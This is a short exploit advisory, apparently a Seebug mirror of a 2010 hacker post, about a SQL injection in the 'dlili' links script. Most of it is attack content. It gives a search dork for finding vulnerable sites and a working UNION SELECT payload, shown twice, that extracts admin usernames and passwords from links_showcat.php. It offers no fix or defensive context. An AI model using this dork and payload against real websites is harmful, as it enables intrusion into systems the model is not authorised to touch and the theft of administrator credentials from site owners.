Dlili Script SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:67616
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ==============================================================================
                  Remote SQL Injection Vulnerability
  ==============================================================================
    [+] Published:           [2010-02-02]
    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
    [+] Author:              {Dr.DaShEr> Nyo@hotmail.com < ]
    [+] Gr44tz to:           [NeX HackEr & XP10_hacker]
  ########################################################################


   [+] Dork: inurl:"links_showcat.php?"


   =[ Exploit ]=

   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


   [-] SQLi p0c:

   [+] http://server[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


  ###########################################################################